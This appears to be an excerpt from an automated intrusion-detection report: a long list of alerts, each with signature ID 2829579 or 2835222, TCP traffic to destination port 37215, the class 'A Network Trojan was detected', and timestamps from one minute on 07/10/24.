                  SID:2829579
                  Source Port:34970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.677011
                  SID:2829579
                  Source Port:57310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.949605
                  SID:2829579
                  Source Port:44368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.142588
                  SID:2835222
                  Source Port:50418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.149235
                  SID:2835222
                  Source Port:56564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.155678
                  SID:2829579
                  Source Port:40428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.740584
                  SID:2835222
                  Source Port:57764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.833668
                  SID:2829579
                  Source Port:35706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.005351
                  SID:2829579
                  Source Port:35072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.659846
                  SID:2835222
                  Source Port:57382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835988
                  SID:2835222
                  Source Port:50278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.144985
                  SID:2829579
                  Source Port:50690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.667118
                  SID:2835222
                  Source Port:55632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.131981
                  SID:2835222
                  Source Port:43786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.358336
                  SID:2829579
                  Source Port:39396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.939939
                  SID:2829579
                  Source Port:50418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.517439
                  SID:2835222
                  Source Port:33304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.850174
                  SID:2835222
                  Source Port:42366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.626200
                  SID:2829579
                  Source Port:42048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.863402
                  SID:2835222
                  Source Port:46054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.841830
                  SID:2829579
                  Source Port:56526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.130042
                  SID:2829579
                  Source Port:57150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.580617
                  SID:2835222
                  Source Port:41326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.746677
                  SID:2835222
                  Source Port:48236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.876739
                  SID:2829579
                  Source Port:58316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.405670
                  SID:2835222
                  Source Port:42144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.776701
                  SID:2829579
                  Source Port:36724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.605487
                  SID:2829579
                  Source Port:40812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.224175
                  SID:2835222
                  Source Port:35302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2829579
                  Source Port:49364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.598590
                  SID:2829579
                  Source Port:35346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.095778
                  SID:2835222
                  Source Port:33782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.541812
                  SID:2835222
                  Source Port:50774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.924774
                  SID:2829579
                  Source Port:40232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2835222
                  Source Port:33832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.240664
                  SID:2835222
                  Source Port:55506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.807023
                  SID:2835222
                  Source Port:35728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.503899
                  SID:2829579
                  Source Port:36496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.500582
                  SID:2829579
                  Source Port:40338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.967479
                  SID:2835222
                  Source Port:52752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.191849
                  SID:2835222
                  Source Port:51934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.896003
                  SID:2835222
                  Source Port:43944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.335498
                  SID:2835222
                  Source Port:43866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949635
                  SID:2829579
                  Source Port:45954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.881889
                  SID:2829579
                  Source Port:52826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972385
                  SID:2829579
                  Source Port:35210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.857125
                  SID:2835222
                  Source Port:51338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.505439
                  SID:2835222
                  Source Port:47872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.556595
                  SID:2835222
                  Source Port:48250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.913533
                  SID:2829579
                  Source Port:56334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069487
                  SID:2835222
                  Source Port:46358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.843176
                  SID:2829579
                  Source Port:48384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985127
                  SID:2835222
                  Source Port:39668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.181410
                  SID:2829579
                  Source Port:57884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.839677
                  SID:2829579
                  Source Port:43078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.862601
                  SID:2829579
                  Source Port:39848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.377944
                  SID:2829579
                  Source Port:54062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.412174
                  SID:2835222
                  Source Port:56602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.321754
                  SID:2829579
                  Source Port:53092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.159705
                  SID:2835222
                  Source Port:48094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.072702
                  SID:2829579
                  Source Port:45790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.937591
                  SID:2829579
                  Source Port:49054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.520220
                  SID:2835222
                  Source Port:57418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.521213
                  SID:2835222
                  Source Port:57746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.142415
                  SID:2829579
                  Source Port:50168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.928325
                  SID:2829579
                  Source Port:49062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.223403
                  SID:2829579
                  Source Port:57132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.922579
                  SID:2829579
                  Source Port:33364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.826871
                  SID:2835222
                  Source Port:55462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.086476
                  SID:2835222
                  Source Port:42648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.155522
                  SID:2835222
                  Source Port:48014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.967012
                  SID:2829579
                  Source Port:57002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.709271
                  SID:2835222
                  Source Port:38676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.179313
                  SID:2829579
                  Source Port:37964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.421271
                  SID:2829579
                  Source Port:45604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.614472
                  SID:2829579
                  Source Port:40610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.825233
                  SID:2829579
                  Source Port:46122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.890011
                  SID:2829579
                  Source Port:48362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.610394
                  SID:2829579
                  Source Port:53890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.567410
                  SID:2835222
                  Source Port:35718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.927826
                  SID:2835222
                  Source Port:50338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.518988
                  SID:2835222
                  Source Port:45010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.616347
                  SID:2835222
                  Source Port:44736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.190112
                  SID:2835222
                  Source Port:32846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.498164
                  SID:2835222
                  Source Port:45560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.939725
                  SID:2835222
                  Source Port:49080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.882503
                  SID:2835222
                  Source Port:45820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.643057
                  SID:2829579
                  Source Port:46640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.873449
                  SID:2829579
                  Source Port:42772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.643057
                  SID:2835222
                  Source Port:56208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.488674
                  SID:2829579
                  Source Port:44126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.239494
                  SID:2829579
                  Source Port:35842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.113849
                  SID:2829579
                  Source Port:33836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.103599
                  SID:2835222
                  Source Port:43738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.337218
                  SID:2829579
                  Source Port:33226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.873449
                  SID:2829579
                  Source Port:39464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.599892
                  SID:2829579
                  Source Port:60850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.029785
                  SID:2835222
                  Source Port:36158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.758689
                  SID:2829579
                  Source Port:49228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.713774
                  SID:2835222
                  Source Port:34292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260349
                  SID:2829579
                  Source Port:57740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.156577
                  SID:2835222
                  Source Port:38246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.831960
                  SID:2829579
                  Source Port:40732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.523426
                  SID:2829579
                  Source Port:52664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.198979
                  SID:2835222
                  Source Port:54454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.141493
                  SID:2835222
                  Source Port:33350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.823605
                  SID:2829579
                  Source Port:36984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.466841
                  SID:2835222
                  Source Port:37306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.827903
                  SID:2835222
                  Source Port:37426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.874680
                  SID:2829579
                  Source Port:49686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.227132
                  SID:2835222
                  Source Port:48480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.846207
                  SID:2829579
                  Source Port:53636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.753614
                  SID:2829579
                  Source Port:55036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.594883
                  SID:2835222
                  Source Port:46742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.132351
                  SID:2829579
                  Source Port:59528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.193272
                  SID:2829579
                  Source Port:47960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.346180
                  SID:2835222
                  Source Port:40378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.362991
                  SID:2829579
                  Source Port:57846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.454627
                  SID:2835222
                  Source Port:59188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.485057
                  SID:2829579
                  Source Port:54586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.139469
                  SID:2829579
                  Source Port:49472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.870902
                  SID:2835222
                  Source Port:51296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.053322
                  SID:2829579
                  Source Port:50570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.295314
                  SID:2835222
                  Source Port:54790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.317114
                  SID:2835222
                  Source Port:50358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.374424
                  SID:2835222
                  Source Port:60244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.824394
                  SID:2829579
                  Source Port:35052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002898
                  SID:2835222
                  Source Port:54164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.798574
                  SID:2835222
                  Source Port:57604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.791767
                  SID:2835222
                  Source Port:52840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.773941
                  SID:2829579
                  Source Port:47326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.595763
                  SID:2835222
                  Source Port:59138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.902387
                  SID:2835222
                  Source Port:60216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.652674
                  SID:2835222
                  Source Port:56998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.237415
                  SID:2829579
                  Source Port:53624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.407750
                  SID:2835222
                  Source Port:32864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.586309
                  SID:2829579
                  Source Port:40958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.551648
                  SID:2835222
                  Source Port:56880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.549149
                  SID:2835222
                  Source Port:49458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.128775
                  SID:2829579
                  Source Port:44732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810848
                  SID:2835222
                  Source Port:38134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.824367
                  SID:2835222
                  Source Port:59688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.838932
                  SID:2835222
                  Source Port:47944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.909297
                  SID:2835222
                  Source Port:41738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.499422
                  SID:2829579
                  Source Port:42090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.833286
                  SID:2835222
                  Source Port:44828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.879601
                  SID:2829579
                  Source Port:48770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.156135
                  SID:2835222
                  Source Port:38794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.680054
                  SID:2835222
                  Source Port:46940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.372666
                  SID:2829579
                  Source Port:50586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.914881
                  SID:2835222
                  Source Port:58920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.805912
                  SID:2829579
                  Source Port:54284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.206981
                  SID:2829579
                  Source Port:48124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.166168
                  SID:2829579
                  Source Port:54266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.851731
                  SID:2835222
                  Source Port:39506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.446922
                  SID:2829579
                  Source Port:55358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.000164
                  SID:2829579
                  Source Port:59130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.776043
                  SID:2829579
                  Source Port:50796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.107055
                  SID:2835222
                  Source Port:49440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.638396
                  SID:2835222
                  Source Port:54904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.174842
                  SID:2835222
                  Source Port:59000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.842272
                  SID:2835222
                  Source Port:38516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.875452
                  SID:2829579
                  Source Port:38498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.912593
                  SID:2835222
                  Source Port:39308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.641864
                  SID:2835222
                  Source Port:55054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.771022
                  SID:2835222
                  Source Port:40230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.026177
                  SID:2835222
                  Source Port:41482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.482835
                  SID:2829579
                  Source Port:58822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.561007
                  SID:2835222
                  Source Port:58586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.005613
                  SID:2829579
                  Source Port:53302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.937517
                  SID:2835222
                  Source Port:40534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.666714
                  SID:2835222
                  Source Port:36710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.858543
                  SID:2835222
                  Source Port:57876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.592193
                  SID:2835222
                  Source Port:59908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.182396
                  SID:2835222
                  Source Port:50378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302858
                  SID:2829579
                  Source Port:54348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152132
                  SID:2835222
                  Source Port:50558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.592193
                  SID:2829579
                  Source Port:50650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.637251
                  SID:2829579
                  Source Port:49842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.041240
                  SID:2829579
                  Source Port:59080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.290826
                  SID:2829579
                  Source Port:53616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.162511
                  SID:2835222
                  Source Port:48994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.428248
                  SID:2835222
                  Source Port:33474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
